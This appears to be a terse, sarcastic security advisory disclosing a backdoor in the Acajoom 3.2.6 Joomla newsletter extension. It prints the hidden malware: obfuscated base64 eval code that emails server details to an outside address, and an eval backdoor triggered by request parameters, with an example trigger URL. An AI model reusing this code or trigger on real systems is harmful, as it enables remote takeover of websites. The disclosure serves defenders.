Vulnerability:     Remote code execution back door Software:     acajoom - mailing list extension for Joomla Acajoom is a newsletter component designed with ease of use and robustness in mind. Acajoom can handle an unlimited number of newsletters with an unlimited number of subscribers in just few clicks. Acajoom reuses some of Joomla 1.5 new concepts to make the users experience as smooth as possible. > And that's not all Severity:     Not a big deal.  Joomla components contain all sorts of obfuscated junk all     the time.  Who cares what it does? URLs: http://www.ijoobi.com/ http://www.ijoobi.com/media/acajoom-3.2.6.zip http://www.ijoobi.com/component/option,com_jtickets/Itemid,18/controller,ticket/pjid,3/task,add/type,110/ Vendor notified: Naah. No contact details. I suppose I might try battle the captcha one day. Vulnerability: http://www.ijoobi.com/media/acajoom-3.2.6.zip install.acajoom.php: function GetBots($us1,$us2,$us3) { list($data1,$data2,$data3) = array('dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ', 'QG1haWwoJHVzMSwgJHVzMiwgImh0','1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs'); eval(base64_decode($data2.$data1.$data3)); } define( 'COUNT_ROOT', $count_db. 1 .chr(64).chr(121).chr(97). '.' .$array_lang[10-$count_num] ); $counter = COUNT_ROOT; $count_db = 'qadr'; $count_num = 8; GetBots($counter,$_SERVER['SERVER_NAME'],$_SERVER['SCRIPT_FILENAME']); Or, less cryptically: @mail('qadr1@ya.ru', $_SERVER['SERVER_NAME'], "http://".$_SERVER['SERVER_NAME'].$_SERVER['SCRIPT_NAME']."\n".$_SERVER['SCRIPT_FILENAME']); self.acajoom.php says: class acajoomCommonStr { function GetStr($str) { eval(stripslashes($str)); } function InController($cnt,$location) { if ($location=='en-g') $this->GetStr($cnt); } } if(isset($_REQUEST['s']) && isset($_REQUEST['lang'])) { $getacajoomStr = new acajoomCommonStr(); $getacajoomStr->InController($_REQUEST['s'],$_REQUEST['lang']); } ie. $URL/self.acajoom.php?s=phpinfo();&lang=en-g $URL is left as an exercise to the reader. Greetz: qadr1@ya.ru